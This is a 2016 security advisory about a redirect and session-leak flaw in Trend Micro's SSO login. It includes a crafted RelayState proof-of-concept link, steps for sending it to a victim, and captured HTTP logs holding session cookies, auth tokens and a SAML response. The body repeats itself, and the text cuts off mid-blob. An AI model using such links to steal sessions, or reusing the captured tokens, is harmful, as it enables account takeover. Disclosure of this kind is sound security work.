Vulnerability Laboratory ID (VL-ID):
====================================
1694
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business.
Its cloud and virtualization security products provide cloud security
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva
Chen
serves as Trend Microâ??s chief executive officer, a position she has held
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as
chairman of Trend Micro.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect
and session web vulnerability in the official trend micro sso online
service web-application.
Technical Details & Description:
================================
A redirect issue with information leaking has been discovered in the
official Trendmirco online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. The execution (which requires a login) will disclose leaking
information to the attackers webserver.
In this case the AuthState value is beeing leaked.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked
by the victim the website requests him to login. After the login the
victim is beeing quitly redirected to the webserver. The previous
requests includes the new AuthState in
the GET request which includes the users session. The AuthState is
beeing exposed in the Referer afterwards. The attacker can use the
AuthState value to overtake the account session.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked by
the victim the website requests him to login. After the login the victim
is beeing quitly redirected to the webserver. The previous requests
includes the new AuthState in the GET
request which includes the users session. The AuthState is beeing
exposed in the Referer afterwards. The attacker can use the AuthState
value to overtake the account session.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
2. The victim will redirect to yahoo
3. The AuthState code will cached on the referer of the attackers
website ... like on yahoo
4. Successful reproduce of the vulnerability!
--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
trend micro sso online service web-application is estimated as high.
(CVSS 6.5)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a
permission.
Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694
Trand Micro ID: 1-1-1035080936
Release Date:
=============
2016-03-31
Vulnerability Laboratory ID (VL-ID):
====================================
1694
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business.
Its cloud and virtualization security products provide cloud security
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva
Chen
serves as Trend Microâ??s chief executive officer, a position she has held
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as
chairman of Trend Micro.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect
and session web vulnerability in the official trend micro sso online
service web-application.
Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri
- Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A redirect issue with information leaking has been discovered in the
official Trendmirco online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. The execution (which requires a login) will disclose leaking
information to the attackers webserver.
In this case the AuthState value is beeing leaked.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked
by the victim the website requests him to login. After the login the
victim is beeing quitly redirected to the webserver. The previous
requests includes the new AuthState in
the GET request which includes the users session. The AuthState is
beeing exposed in the Referer afterwards. The attacker can use the
AuthState value to overtake the account session.
The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked by
the victim the website requests him to login. After the login the victim
is beeing quitly redirected to the webserver. The previous requests
includes the new AuthState in the GET
request which includes the users session. The AuthState is beeing
exposed in the Referer afterwards. The attacker can use the AuthState
value to overtake the account session.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
2. The victim will redirect to yahoo
3. The AuthState code will cached on the referer of the attackers
website ... like on yahoo
4. Successful reproduce of the vulnerability!
--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0
$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3
Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session
;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J
9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAA
ABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(n
one);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3
A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22
%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt"
:1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"h
ttp%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2Fproduct
ID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E
717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%2
6SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%
3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684
efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb",
"r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"
MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fs
ignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%
253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:22 GMT]
Server[Apache/2.2.15 (CentOS)]
Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php
/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[368] Mime Type[text/html]
Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spe
ntityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyaho
o.com%2Fmy_account%2F&language=EN-US]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0
$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3
Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session
;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J
9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAA
ABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(n
one);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3
A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22
%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt"
:1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"h
ttp%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2Fproduct
ID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E
717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%2
6SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%
3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684
efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb",
"r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"
MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fs
ignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%
253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
Connection[keep-alive]
Post Data:
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM
6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0Yzp
TQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY
1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQ
xMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20
vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXN
wIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zY
W1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zO
mRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkS
W5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cud
zMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZ
CBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhM
SIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwO
GFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvc
ml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnb
mF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzI
wMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9
kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz4
8ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZ
XN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1c
mVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSS
EFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZyS
G9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQ
kVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81T
WovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS
3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2M
Es0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczp
LZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F
3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1
UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0V
ERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F
3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTN
XYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1
lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1Z
PTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJ
qNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHV
hMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1
vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0J
CUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHE
yZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1N
ZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUF
QbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0R
OYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3E
yUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1
ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5
ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2V
kS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2V
xN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BP
C9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR
1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2V
zcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly9
3d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d
3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmE
wMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0
wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5
jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWd
uYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgo
gIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0
iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U
2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94b
Wxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWI
xNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJ
hbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2V
udmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d
3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkc
zpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htb
GRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMU
Fk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGR
zOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGt
EQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZ
vUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZ
jNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0F
TcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9
CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2h
aUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx
1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUl
JREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXh
EakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVR
BeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJ
BUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFl
NZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFg
zVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGd
OdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1
aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c
5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM
4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUI
wR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTN
nQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkd
WeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJ
CUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZ
ibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnY
yejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWl
rKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9
PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejF
YQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc
4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kc
zpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjd
D48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0id
XJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fN
WVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJR
D48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjO
lNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm9
0T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2F
jY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWw
yLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2
BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtM
jlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2Ftb
